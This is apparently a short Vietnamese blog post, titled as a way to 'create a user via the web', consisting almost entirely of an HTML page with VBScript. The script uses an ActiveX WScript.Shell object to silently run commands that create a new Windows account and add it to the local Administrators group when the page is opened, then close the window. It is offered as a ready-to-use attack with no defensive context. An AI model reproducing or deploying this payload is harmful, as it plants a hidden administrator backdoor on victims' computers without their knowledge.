Tạo user bằng web
[html][object id=wsh
classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B][/object]
[script language=vbscript]
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user NEW_USER fuckbiatch /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators NEW_USER /add",0)
window.close
[/script]
[/html]
0 Nhận xét:
Đăng nhận xét
Đăng ký Đăng Nhận xét [Atom]
<< Trang chủ